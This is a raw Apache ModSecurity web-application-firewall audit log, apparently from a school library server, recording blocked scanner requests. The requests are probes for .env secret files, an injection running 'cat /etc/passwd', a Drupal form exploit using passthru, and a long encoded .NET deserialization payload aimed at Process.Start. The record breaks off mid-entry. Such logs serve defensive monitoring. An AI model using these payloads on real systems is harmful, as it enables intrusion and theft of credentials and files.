/.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --174f9f1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --174f9f1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558109 2348 (- - -) Stopwatch2: 1747800197558109 2348; combined=423, p1=391, p2=0, p3=0, p4=0, p5=32, sr=177, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --174f9f1e-Z-- --4567b916-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqQAAAAE 103.236.140.4 41326 103.236.140.4 8181 --4567b916-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --4567b916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4567b916-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557834 2802 (- - -) Stopwatch2: 1747800197557834 2802; combined=371, p1=313, p2=0, p3=0, p4=0, p5=58, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4567b916-Z-- --93745112-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqgAAAAM 103.236.140.4 41352 103.236.140.4 8181 --93745112-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --93745112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93745112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558211 2602 (- - -) Stopwatch2: 1747800197558211 2602; combined=331, p1=293, p2=0, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93745112-Z-- --bf8a5317-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqwAAAAY 103.236.140.4 41358 103.236.140.4 8181 --bf8a5317-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --bf8a5317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf8a5317-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558332 2660 (- - -) Stopwatch2: 1747800197558332 2660; combined=365, p1=322, p2=0, p3=0, p4=0, p5=43, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf8a5317-Z-- --1a3e3e3e-A-- [21/May/2025:11:19:20 +0700] aC1USBpv_mIXt2pDBOoHPgAAAMg 103.236.140.4 41436 103.236.140.4 8181 --1a3e3e3e-B-- POST /account HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 100 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788454 --1a3e3e3e-C-- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=sfuxn --1a3e3e3e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a3e3e3e-E-- --1a3e3e3e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /account"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801160260746 2283 (- - -) Stopwatch2: 1747801160260746 2283; combined=580, p1=378, p2=160, p3=0, p4=0, p5=42, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a3e3e3e-Z-- --982b9140-A-- [21/May/2025:11:19:20 +0700] aC1USHZGSt58M5vv3glytwAAAAI 103.236.140.4 41456 103.236.140.4 8181 --982b9140-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474781 --982b9140-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --982b9140-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982b9140-E-- --982b9140-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801160283733 8534 (- - -) Stopwatch2: 1747801160283733 8534; combined=7449, p1=230, p2=7202, p3=0, p4=0, p5=17, sr=40, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982b9140-Z-- --a6882021-A-- [21/May/2025:11:19:20 +0700] aC1USIv3pT1iV0OxjLTn1wAAAJA 103.236.140.4 41466 103.236.140.4 8181 --a6882021-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474784 --a6882021-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --a6882021-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6882021-E-- --a6882021-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747801160299045 4707 (- - -) Stopwatch2: 1747801160299045 4707; combined=3360, p1=393, p2=2885, p3=27, p4=28, p5=27, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6882021-Z-- --449ecd5e-A-- [21/May/2025:11:19:20 +0700] aC1USIv3pT1iV0OxjLTn2AAAAJE 103.236.140.4 41468 103.236.140.4 8181 --449ecd5e-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 160557812 --449ecd5e-C-- --449ecd5e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --449ecd5e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747801160299152 4860 (- - -) Stopwatch2: 1747801160299152 4860; combined=3322, p1=371, p2=2875, p3=24, p4=23, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --449ecd5e-Z-- --01cc9a5b-A-- [21/May/2025:11:19:20 +0700] aC1USIv3pT1iV0OxjLTn2QAAAJU 103.236.140.4 41472 103.236.140.4 